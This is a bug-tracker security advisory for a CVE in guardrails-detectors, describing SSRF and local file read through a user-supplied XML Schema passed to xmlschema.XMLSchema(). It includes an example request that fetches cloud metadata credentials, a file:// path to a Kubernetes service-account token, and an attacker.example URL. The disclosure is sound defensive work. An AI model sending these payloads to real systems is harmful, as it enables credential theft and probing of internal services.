Bug 2498165 (CVE-2026-15143) - CVE-2026-15143 guardrails-detectors: guardrails-detectors: SSRF and local file read via user-supplied XML Schema (xml-with-schema:)
Summary: CVE-2026-15143 guardrails-detectors: guardrails-detectors: SSRF and local fil...
Keywords:
Status: NEW
Alias: CVE-2026-15143
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
high
high
Target Milestone: ---
Assignee: Product Security
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2026-07-08 17:13 UTC by OSIDB Bzimport
Modified: 2026-07-10 15:16 UTC (History)
1 user (show)

Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:


Attachments (Terms of Use)

Description OSIDB Bzimport 2026-07-08 17:13:53 UTC
The file_type content detector in guardrails-detectors accepts an arbitrary XML Schema Definition (XSD) string supplied directly in the request body and passes it unmodified to xmlschema.XMLSchema(), which by default resolves <xs:import>, <xs:include>, and <xs:redefine> schemaLocation references over any URL scheme (including http(s):// and file://).

Affected code: detectors/built_in/file_type_detectors.py, function is_valid_xml_schema():

    xs = xmlschema.XMLSchema(schema)

schema is taken directly from the request's detector_params.file_type value for the "xml-with-schema:<XSD>" detector type, with no sanitization or scheme restriction. The xmlschema library is pinned to 4.1.0 in detectors/pyproject.toml; that version only restricts external references when the caller explicitly passes allow='sandbox' or allow='local', which this code does not do.

An attacker with network access to the detector service can send a request such as:

{"contents": ["<a/>"],
 "detector_params": {"file_type": [
   "xml-with-schema:<xs:schema xmlns:xs='http://www.w3.org/2001/XMLSchema'><xs:include schemaLocation='http://169.254.169.254/latest/meta-data/iam/security-credentials/'/></xs:schema>"
 ]}}

which causes the detector pod to make a blind, server-side HTTP request to the supplied URL before validation completes. This can be pointed at cloud provider instance-metadata endpoints (credential theft), the in-cluster Kubernetes API server, internal services such as MinIO, or any other endpoint reachable from the pod's network namespace. Using a file:// scheme (e.g. schemaLocation='file:///var/run/secrets/kubernetes.io/serviceaccount/token') causes the library to attempt to read that local file instead. A bare string such as "xml-with-schema:http://attacker.example/x.xsd" (with no xs:include wrapper at all) is sufficient by itself, since xmlschema.XMLSchema() treats a string that looks like a URL as a schema location to fetch.

The parsing/construction step is wrapped in a generic except Exception, so the HTTP response or file contents are not returned to the caller (exploitation is blind/error-based), but the outbound request or local file open is still made server-side regardless of whether the exception is later raised.

Verified directly against the current upstream source (trustyai-explainability/guardrails-detectors, main branch, commit 747a4d3 at the time of this analysis) that the vulnerable code and the xmlschema==4.1.0 pin are both still present and unchanged.

Reported via Red Hat Product Security's internal "Project Glasswing" (Mythos) security audit of RHOAI components. Original audit reference: rhoai-3.4 @ 29f7a14d008e667d6f216ba5921e95daf6c9a269 (RHOAIENG-71919).


Note You need to log in before you can comment on or make changes to this bug.